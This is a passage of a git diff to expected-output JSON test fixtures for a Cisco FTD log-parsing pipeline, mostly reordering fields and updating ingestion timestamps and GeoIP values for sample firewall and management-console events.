"udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2929,7 +2809,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097011800Z", + "ingested": "2021-12-14T14:37:39.593583018Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", @@ -2991,37 +2871,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -3030,15 +2904,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -3077,7 +2951,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097017800Z", + "ingested": "2021-12-14T14:37:39.593583358Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json index 5271161c37c..c08cccdbdfa 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2019-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" 
@@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.751642700Z", + "ingested": "2021-12-14T14:37:43.824205506Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:33:00.751651600Z", + "ingested": "2021-12-14T14:37:43.824208214Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json index 60dcd209115..c483bae03e3 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-firepower-management.log-expected.json 
@@ -1,1257 +1,1254 @@ { "expected": [ { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:56:30.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917237300Z", + "ingested": "2021-12-14T14:37:43.991231592Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917245300Z", + "ingested": "2021-12-14T14:37:43.991234161Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ChangeReconciliation.cgi" - }, - "log": { - "level": "debug" - }, 
- "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ChangeReconciliation.cgi" + }, "@timestamp": "2019-08-14T13:57:26.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917254100Z", + "ingested": "2021-12-14T14:37:43.991234631Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:34.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917259700Z", + "ingested": "2021-12-14T14:37:43.991235049Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "lights_out_mgmt.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": 
"firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "lights_out_mgmt.cgi" + }, "@timestamp": "2019-08-14T13:57:43.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917265Z", + "ingested": "2021-12-14T14:37:43.991235436Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917270200Z", + "ingested": "2021-12-14T14:37:43.991235827Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + 
"facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917275600Z", + "ingested": "2021-12-14T14:37:43.991236232Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917280800Z", + "ingested": "2021-12-14T14:37:43.991236633Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:41.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917286100Z", + "ingested": "2021-12-14T14:37:43.991237020Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", 
"code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:58:47.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917291400Z", + "ingested": "2021-12-14T14:37:43.991237399Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:52.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917296700Z", + "ingested": "2021-12-14T14:37:43.991237786Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { 
"type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:54.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917302400Z", + "ingested": "2021-12-14T14:37:43.991238396Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:10.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917307900Z", + "ingested": "2021-12-14T14:37:43.991238793Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:15.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { 
"severity": 7, - "ingested": "2021-12-09T13:33:00.917313200Z", + "ingested": "2021-12-14T14:37:43.991239186Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917318400Z", + "ingested": "2021-12-14T14:37:43.991239578Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917323700Z", + "ingested": "2021-12-14T14:37:43.991239980Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: 
Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917329100Z", + "ingested": "2021-12-14T14:37:43.991240510Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917334500Z", + "ingested": "2021-12-14T14:37:43.991240894Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": 
"firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917339800Z", + "ingested": "2021-12-14T14:37:43.991241275Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:13.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917345100Z", + "ingested": "2021-12-14T14:37:43.991241656Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, 
"event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917350400Z", + "ingested": "2021-12-14T14:37:43.991242046Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917355800Z", + "ingested": "2021-12-14T14:37:43.991242433Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917361100Z", + "ingested": "2021-12-14T14:37:43.991242814Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration 
Generation\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:01:35.000Z", - "ecs": { - "version": "1.12.0" - }, - "host": { - "name": "siem-management" - }, - "event": { - "severity": 7, - "ingested": "2021-12-09T13:33:00.917366500Z", - "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", - "code": "" - }, - "cisco": { - "ftd": {} - } - }, - { "process": { "name": "ActionQueueScrape.pl" }, + "@timestamp": "2019-08-14T14:01:35.000Z", + "ecs": { + "version": "1.12.0" + }, "log": { "level": "debug" }, + "host": { + "name": "siem-management" + }, "syslog": { "facility": { "code": 14 } }, + "event": { + "severity": 7, + "ingested": "2021-12-14T14:37:43.991243314Z", + "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", + "code": "" + }, + "cisco": { + "ftd": {} + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:36.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917371800Z", + "ingested": "2021-12-14T14:37:43.991243696Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for 
siem-ftd\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:01:55.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917377200Z", + "ingested": "2021-12-14T14:37:43.991244091Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:56.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917382500Z", + "ingested": "2021-12-14T14:37:43.991244481Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": 
"Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:57.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917387700Z", + "ingested": "2021-12-14T14:37:43.991244860Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:03.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917393Z", + "ingested": "2021-12-14T14:37:43.991245243Z", "original": "\u003c14\u003eAug 14 2019 